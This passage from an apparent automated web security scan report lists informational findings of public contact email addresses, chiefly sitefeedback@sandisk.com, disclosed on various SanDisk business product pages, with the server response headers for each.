Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.82. http://www.sandisk.com/business-solutions/embedded-products/inand previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/embedded-products/inand

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37581
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.83. http://www.sandisk.com/business-solutions/find-a-distributor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/find-a-distributor

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19642
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=ysssvz55hrpsoeep5niw5145; path=/; HttpOnly
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.84. http://www.sandisk.com/business-solutions/flash-memory-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38736
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.85. http://www.sandisk.com/business-solutions/flash-memory-cards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38741
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.86. http://www.sandisk.com/business-solutions/flash-memory-cards/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38737
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.87. http://www.sandisk.com/business-solutions/flash-memory-cards/compact-flash-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards/compact-flash-cards

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37476
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.88. http://www.sandisk.com/business-solutions/flash-memory-cards/memory-stick-pro-duo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards/memory-stick-pro-duo

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37227
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.89. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards/sandisk-memory-stick-micro-(m2)-cards-

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36650
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.90. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36558
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.91. http://www.sandisk.com/business-solutions/mobile-handset-vendors previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38644
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.92. http://www.sandisk.com/business-solutions/mobile-handset-vendors.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38649
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.93. http://www.sandisk.com/business-solutions/mobile-handset-vendors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38645
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.94. http://www.sandisk.com/business-solutions/mobile-handset-vendors/inand previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/inand

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37695
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.95. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/m2

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37198
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.96. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/m2.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37203
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.97. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/microsdhc

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37642
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.98. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-handset-vendors/microsdhc.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37647
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.99. http://www.sandisk.com/business-solutions/mobile-network-operators previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-network-operators

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40121
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.100. http://www.sandisk.com/business-solutions/mobile-network-operators.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-network-operators.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40126
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.101. http://www.sandisk.com/business-solutions/mobile-network-operators/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-network-operators/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40122
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.102. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-network-operators/memory-cards-

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38689
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.103. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards-.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/mobile-network-operators/memory-cards-.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38694
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.104. http://www.sandisk.com/business-solutions/sd-worm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41398
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.105. http://www.sandisk.com/business-solutions/sd-worm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41399
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.106. http://www.sandisk.com/business-solutions/sd-worm/benefits previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/benefits

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.107. http://www.sandisk.com/business-solutions/sd-worm/case-studies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/case-studies

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40650
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.108. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-card previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/sd-worm-card

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44010
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.109. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-contact-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/sd-worm-contact-us

Issue detail

The following email addresses were disclosed in the response:

SDWORM@sandisk.com
sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48323
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<br />Please send us an email at SDWORM@sandisk.com or fill out the contact form below, and we will get back to you shortly.</td>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.110. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-downloads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/sd-worm-downloads

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20267
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.111. http://www.sandisk.com/business-solutions/sd-worm/solutions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/sd-worm/solutions

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39762
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.112. http://www.sandisk.com/business-solutions/ssd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/ssd

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43483
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.113. http://www.sandisk.com/business-solutions/ssd.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/ssd.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43488
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.114. http://www.sandisk.com/business-solutions/ssd/landing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/ssd/landing

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.115. http://www.sandisk.com/business-solutions/technology previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/technology

Issue detail

The following email addresses were disclosed in the response:

info@trustedflashforum.com
sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17943
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:info@trustedflashforum.com">info@trustedflashforum.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.116. http://www.sandisk.com/business-solutions/usb-flash-drives previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37009
Content-Type: text/html; charset=utf-8
